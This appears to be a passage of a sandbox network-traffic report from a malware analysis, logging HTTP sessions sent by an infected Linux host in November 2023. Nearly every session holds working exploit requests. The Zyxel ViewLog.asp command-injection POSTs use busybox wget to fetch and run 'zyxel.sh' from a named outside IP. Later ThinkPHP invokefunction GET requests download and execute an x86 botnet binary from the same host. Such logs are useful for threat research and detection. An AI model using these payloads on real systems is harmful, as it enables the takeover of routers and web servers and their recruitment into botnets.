                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              403192.168.2.233633294.123.180.1808080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.164932013 CET8455OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              404192.168.2.233679494.122.58.1598080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.168292999 CET8455OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              405192.168.2.234475695.86.84.1788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.177377939 CET8456OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              406192.168.2.234569862.34.73.1218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.413160086 CET8459OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:09.324547052 CET8608OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.116236925 CET8834OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              407192.168.2.234725862.210.45.358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.413407087 CET8459OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.709729910 CET8511INHTTP/1.1 403 Forbidden
                                                              Content-Type: application/json;charset=utf-8
                                                              Content-Length: 0
                                                              Server: Jetty(9.1.z-SNAPSHOT)


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              408192.168.2.234770031.136.252.438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.463640928 CET8468OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:09.452508926 CET8610OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.436250925 CET8855OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.531748056 CET9341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.466677904 CET10304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:39.336616993 CET12241OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.332319021 CET16298OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              409192.168.2.233296831.16.184.1508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.467406988 CET8477OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.806376934 CET8585INHTTP/1.1 303 See Other
                                                              Content-Length: 0
                                                              Vary: Accept-Encoding
                                                              Server: DVBLink/6.0.0 (CherryPy/3.2.0)
                                                              Location: http://192.168.0.14:80/
                                                              Date: Mon, 13 Nov 2023 21:19:08 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Nov 13, 2023 22:19:08.810683966 CET8587INHTTP/1.1 400 Bad Request
                                                              Content-Length: 23
                                                              Content-Type: text/plain
                                                              Data Raw: 49 6c 6c 65 67 61 6c 20 65 6e 64 20 6f 66 20 68 65 61 64 65 72 73 2e
                                                              Data Ascii: Illegal end of headers.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              41192.168.2.234554231.151.80.2478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:14.640542030 CET1884OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:14.962136030 CET1965INHTTP/1.1 404 Not Found
                                                              Date: Sun, 12 Nov 2023 14:14:30 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
                                                              Nov 13, 2023 22:18:15.882493019 CET2008INHTTP/1.1 404 Not Found
                                                              Date: Sun, 12 Nov 2023 14:14:30 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              410192.168.2.233669085.202.87.1528080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.474488974 CET8478OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.807306051 CET8586INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:08 GMT
                                                              Server: Apache
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              411192.168.2.235923285.16.85.1008080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.481071949 CET8480OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              412192.168.2.234840094.120.9.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.496268988 CET8482OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              413192.168.2.234914862.122.176.108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.502131939 CET8483OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              414192.168.2.235564294.120.98.448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.507796049 CET8484OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              41594.14.124.358080192.168.2.2342766
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.712331057 CET8546INHTTP/1.1 400 Bad Request
                                                              Server: sky_router
                                                              X-Frame-Options: Deny
                                                              Cache-Control: no-cache
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H4>400 Bad Request</H4>No request found.</BODY></HTML>
                                                              Nov 13, 2023 22:19:10.198405981 CET8725INHTTP/1.1 400 Bad Request
                                                              Server: sky_router
                                                              X-Frame-Options: Deny
                                                              Cache-Control: no-cache
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              416192.168.2.234987495.210.84.7780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.736144066 CET8582OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              417192.168.2.235630295.0.152.12480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.774194956 CET8583OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:17.135747910 CET9566INHTTP/1.1 504 Gateway Timeout
                                                              Connection: close
                                                              Nov 13, 2023 22:19:17.343039989 CET9577INHTTP/1.1 504 Gateway Timeout
